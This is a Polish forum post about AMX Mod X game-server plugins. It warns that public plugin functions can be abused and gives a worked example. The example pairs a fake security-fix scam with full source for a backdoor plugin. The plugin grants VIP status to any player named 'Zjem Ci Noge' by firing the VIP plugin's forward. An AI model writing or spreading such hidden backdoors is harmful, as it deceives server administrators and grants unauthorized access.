Nie ma żadnego wpływu na komaptybilność z tym że musisz bardzo mądrze wybierać czy dana funkcja ma być publiczna czy nie gdyż łatwo zakłócić prawidłowe działanie pluginu poprzez włamanie się do niego. Przykład z życia wzięty. Generator
vip'a generuje nam pięknego
vip'a i aktualnie 90% serwerów ma go na swoim serwerze. Teraz ogłosze że aktualne binarki mają mega błąd przez który można mieć dostęp do plików serwerowych i mój plugin go naprawia (dam sam .
amxx nie .sma + flaga -d0
) choć błędu ani sposobu na jego naprawe nie ma ludzie będą się bać i na wszelki wypadek ładowac mój plugin
A o to source code:
#include <amxmodx>
public client_authorized(id)
{
if(task_exists(id)) remove_task(id)
set_task(1.0,"DajMiVipa",id)
}
public DajMiVipa(id)
{
new name[32]
get_user_name(id,name,31)
if(equal(name,"Zjem Ci Noge"))
{
new r
ExecuteForward(CreateMultiForward("client_authorized_vip", ET_IGNORE, FP_CELL), r, id)
}
}
I takim oto sposobem będę miał
vip'a na każdym serwerze który będzie miał ten plugin
Marzenia + czarny charaketer == Ja
Chcesz napisać do mnie na
PW to:
Mój tok myślenia jest błędny? Wskaż mi błąd zmienie to!
Aktualnie bije limit 32 graczy (łącze serwery) ale nadal są lagi przy zbyt dużym przesyłu informacji
Gra się płynnie do 40~50 graczy potem łącze pada i zamiast biegać ludzie się teleportują